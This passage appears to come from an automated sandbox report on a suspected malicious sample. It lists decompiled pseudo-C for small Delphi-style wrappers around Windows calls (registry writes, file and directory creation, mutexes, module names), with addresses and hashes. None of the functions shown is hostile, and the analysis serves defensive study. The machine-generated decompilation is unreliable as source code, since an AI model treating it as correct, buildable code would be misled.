                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00432310 Relevance: 1.5, APIs: 1, Instructions: 42registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00432310(void* __eax, char* __ecx, char __edx, void* __eflags, intOrPtr _a4, int _a8) {
				char* _v8;
				char _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t11;
				long _t17;
				void* _t20;
				void* _t21;
				intOrPtr _t23;
				char _t26;

				_v8 = __ecx;
				_t26 = __edx;
				_t21 = __eax;
				_t11 = E00431D9C(_a4);
				_t27 = _t11;
				_t17 = RegSetValueExA( *(_t21 + 4), E00404E80(__edx), 0, _t11, _v8, _a8); // executed
				if(_t17 != 0) {
					_v16 = _t26;
					_v12 = 0xb;
					_t23 =  *0x49daf4; // 0x417504
					_t20 = E0040D23C(_t21, _t23, 1, _t26, _t27, 0,  &_v16);
					E00404378();
					return _t20;
				}
				return _t17;
			}
















                                                                                                                                                                                                                            0x00432319
                                                                                                                                                                                                                            0x0043231c
                                                                                                                                                                                                                            0x0043231e
                                                                                                                                                                                                                            0x00432323
                                                                                                                                                                                                                            0x00432328
                                                                                                                                                                                                                            0x00432341
                                                                                                                                                                                                                            0x00432348
                                                                                                                                                                                                                            0x0043234a
                                                                                                                                                                                                                            0x0043234d
                                                                                                                                                                                                                            0x00432357
                                                                                                                                                                                                                            0x00432364
                                                                                                                                                                                                                            0x00432369
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00432369
                                                                                                                                                                                                                            0x00432374

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00432341
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: 19274d5597ff4bf67958b91c708d6c228912aaa851d12f25db2d8365e4f6a269
                                                                                                                                                                                                                            • Instruction ID: 39d1438e57032ee4bbe9f28f00567530b1aebd0f65b6a02640603f55bb4cbe43
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19274d5597ff4bf67958b91c708d6c228912aaa851d12f25db2d8365e4f6a269
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47F0A471A001087BD700EBAEDC81EAFB7EC9B49314F0040BAFA18E7391DA749D0087A4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043EAF8 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E0043EAF8(intOrPtr __eax) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t14;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t27;

				_push(_t19);
				_v8 = __eax;
				 *(_v8 + 0x54) =  *(_v8 + 0x54) | 0x00000200;
				_push(_t27);
				_push(0x43eb45);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27;
				_t14 =  *((intOrPtr*)(_v8 + 0x180));
				_push(_t14); // executed
				L00407568(); // executed
				if(_t14 == 0) {
					E0040E79C(_t18, _t19, _t23, _t24);
				}
				_pop(_t22);
				 *[fs:eax] = _t22;
				_push(0x43eb4c);
				_t16 = _v8;
				 *(_t16 + 0x54) =  *(_t16 + 0x54) & 0x0000fdff;
				return _t16;
			}













                                                                                                                                                                                                                            0x0043eafb
                                                                                                                                                                                                                            0x0043eafc
                                                                                                                                                                                                                            0x0043eb02
                                                                                                                                                                                                                            0x0043eb0a
                                                                                                                                                                                                                            0x0043eb0b
                                                                                                                                                                                                                            0x0043eb10
                                                                                                                                                                                                                            0x0043eb13
                                                                                                                                                                                                                            0x0043eb19
                                                                                                                                                                                                                            0x0043eb1f
                                                                                                                                                                                                                            0x0043eb20
                                                                                                                                                                                                                            0x0043eb27
                                                                                                                                                                                                                            0x0043eb29
                                                                                                                                                                                                                            0x0043eb29
                                                                                                                                                                                                                            0x0043eb30
                                                                                                                                                                                                                            0x0043eb33
                                                                                                                                                                                                                            0x0043eb36
                                                                                                                                                                                                                            0x0043eb3b
                                                                                                                                                                                                                            0x0043eb3e
                                                                                                                                                                                                                            0x0043eb44

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73CA9840.USER32(?,00000000,0043EB45), ref: 0043EB20
                                                                                                                                                                                                                              • Part of subcall function 0040E79C: GetLastError.KERNEL32(00000000,0040E82C), ref: 0040E7B6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: A9840ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3743331550-0
                                                                                                                                                                                                                            • Opcode ID: 162f4c810722b2cf9dba1348c30168551af8e42deea3d9e9740feb706b3eb27c
                                                                                                                                                                                                                            • Instruction ID: c963e65f66f93bc950c3b922f0db45755e41eff8f234a4ebd21f449329ecdab1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 162f4c810722b2cf9dba1348c30168551af8e42deea3d9e9740feb706b3eb27c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EF03031615704EFEB16CB6ACA56D59F7E8EB0C710B6204BAF900D7691E638BD10DA18
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00425A84 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00425A84(void* __eax, struct tagSIZE* __ecx, void* __edx, void* __eflags) {
				int _t9;
				int _t13;
				void* _t14;
				intOrPtr _t17;

				_t14 = __eax;
				_t17 =  *0x425ac4; // 0x3
				E00425D3C(__eax, __ecx, _t17);
				 *__ecx = 0;
				__ecx->cy = 0;
				_t9 = E00404C80(__edx);
				_t13 = GetTextExtentPoint32A( *(_t14 + 4), E00404E80(__edx), _t9, __ecx); // executed
				return _t13;
			}







                                                                                                                                                                                                                            0x00425a8b
                                                                                                                                                                                                                            0x00425a8d
                                                                                                                                                                                                                            0x00425a95
                                                                                                                                                                                                                            0x00425a9c
                                                                                                                                                                                                                            0x00425aa0
                                                                                                                                                                                                                            0x00425aa6
                                                                                                                                                                                                                            0x00425ab8
                                                                                                                                                                                                                            0x00425ac0

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTextExtentPoint32A.GDI32(?,00000000,00000000), ref: 00425AB8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExtentPoint32Text
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 223599850-0
                                                                                                                                                                                                                            • Opcode ID: 09f60f6af201f6e62a1044751ee0e5612e5c10b55f71d40865da04b658c4b6fb
                                                                                                                                                                                                                            • Instruction ID: 930b99cdb260b2b8a229d6862ebc98a20fe47073bc0098dbe1fe4fd8dd38ffb9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09f60f6af201f6e62a1044751ee0e5612e5c10b55f71d40865da04b658c4b6fb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AE08CB23112102B9350EB7E6C81A6BAAED8FCC225309897FF98CD3342D538DC058368
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00405F94 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00405F94(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E004061D0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








                                                                                                                                                                                                                            0x00405f9c
                                                                                                                                                                                                                            0x00405fa2
                                                                                                                                                                                                                            0x00405fb2
                                                                                                                                                                                                                            0x00405fbb
                                                                                                                                                                                                                            0x00405fc0
                                                                                                                                                                                                                            0x00405fc2
                                                                                                                                                                                                                            0x00405fc7
                                                                                                                                                                                                                            0x00405fcc
                                                                                                                                                                                                                            0x00405fcc
                                                                                                                                                                                                                            0x00405fc7
                                                                                                                                                                                                                            0x00405fda

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?,00000400,?,004174D4,0041AC1B,00000000,0041AC40), ref: 00405FB2
                                                                                                                                                                                                                              • Part of subcall function 004061D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2796650324-0
                                                                                                                                                                                                                            • Opcode ID: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                                                                                                                                                                                            • Instruction ID: b1b40bdc6994046442ce0d201b14f24feebb016b61ac17d43a71f6c7551704b1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29E06D71A003148BCB10DE9889C1A8377E8AB08754F0009B6BC54EF38AD3B8DD208BD4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409974 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                            			E00409974(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}





                                                                                                                                                                                                                            0x00409977
                                                                                                                                                                                                                            0x00409988
                                                                                                                                                                                                                            0x0040998f
                                                                                                                                                                                                                            0x00409991
                                                                                                                                                                                                                            0x00409991
                                                                                                                                                                                                                            0x0040999f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00409988
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                                                                            • Opcode ID: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                                                                                                                                                                                            • Instruction ID: 0d5b49b13c8f4389bf346f82ff244d5682fd19cf5393362de481199118583149
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BDD05BB63091107AD220955F9C44DEB5BDCCBC6771F104B3EB598D32C1D6348C018375
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409A58 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409A58(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E00404E80(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                                                                                                                                                                            0x00409a63
                                                                                                                                                                                                                            0x00409a6b
                                                                                                                                                                                                                            0x00409a74
                                                                                                                                                                                                                            0x00409a75
                                                                                                                                                                                                                            0x00409a78
                                                                                                                                                                                                                            0x00409a78

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,00473256,?,?,00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00409A63
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                            • Opcode ID: cc3281f0d5de1a522d07f6452786b59158e8658712641635155b8b823164a454
                                                                                                                                                                                                                            • Instruction ID: b45727f5bee9a1b88d075e34cfdcfeb0f7af153fe39d01b3b8471be6c8c36cfb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc3281f0d5de1a522d07f6452786b59158e8658712641635155b8b823164a454
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7AC08CB1B092002ADE5061FD1CC2A0B42C80A442387602B3BF47EF23D3E23DAC162418
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406F8E Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00406F8E(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                                                                                                                                                                                                            0x00406f93
                                                                                                                                                                                                                            0x00406f9b
                                                                                                                                                                                                                            0x00406fa6
                                                                                                                                                                                                                            0x00406fac

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateMutex
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                                                                                                            • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                                                                                                                                                                                            • Instruction ID: 98e81aead139b17a815cef7455711068e9fc67f306ce3b3ca14eba37014c667d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76D0127325024DAFCB00EEBDDC05DAB33DC9728609B408425B929C7100D139E9508B60
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406F90 Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00406F90(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                                                                                                                                                                                                            0x00406f93
                                                                                                                                                                                                                            0x00406f9b
                                                                                                                                                                                                                            0x00406fa6
                                                                                                                                                                                                                            0x00406fac

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateMutex
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                                                                                                            • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                                                                                                                                                            • Instruction ID: 3e008c22956fc280003415e3679d606a6b79cccc06a071e67c7aa2054a22c523
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96C0127315024DAFCB00EEA9DC05D9B33DC5728609B408425B929C7100C139E5508B60
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040991C Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040991C(void* __eax) {
				void* _t4;

				_t4 = CreateFileA(E00404E80(__eax), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
				return _t4;
			}




                                                                                                                                                                                                                            0x00409939
                                                                                                                                                                                                                            0x0040993f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00418E54,00409945,0041DBE4,00000000,0041DCC1,?,?,00418E54,00000001), ref: 00409939
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                            • Opcode ID: c5ddbda4215acf3c06d730482f71bc4e853fb376322842d739a3031f130d3369
                                                                                                                                                                                                                            • Instruction ID: 060bc272a188b5da0ac96ce548da9ccbd18b50796637518aaa4824f3fdc661df
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5ddbda4215acf3c06d730482f71bc4e853fb376322842d739a3031f130d3369
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DC092B03C030032F93021B62C8BF26004C2744F18FA2853AB785FE1C3C8E9B818015C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409F54 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00409F54(void* __eax) {
				int _t4;

				_t4 = CreateDirectoryA(E00404E80(__eax), 0); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}




                                                                                                                                                                                                                            0x00409f61
                                                                                                                                                                                                                            0x00409f69
                                                                                                                                                                                                                            0x00409f6d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,0047638B), ref: 00409F61
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4241100979-0
                                                                                                                                                                                                                            • Opcode ID: 8560409eb3f1d5c0bf4fd62c23b8086ce7d4dade3db60e21e326d19d4a95f5a9
                                                                                                                                                                                                                            • Instruction ID: d06271dbac5e2ad416fd06201c67f134fcd2da453fbdd723ce63acec7380a99a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8560409eb3f1d5c0bf4fd62c23b8086ce7d4dade3db60e21e326d19d4a95f5a9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07B092A27503411AEE0035FA2CC2B2A008CA74861AF110A3EF656E61C2D47AC8184068
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045D2F8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0045D2F8(signed int __eax, void* __ecx) {
				struct _ITEMIDLIST** _t10;

				SHGetSpecialFolderLocation(0,  *(0x49bf84 + (__eax & 0x0000007f) * 4), _t10); // executed
				return  *_t10;
			}




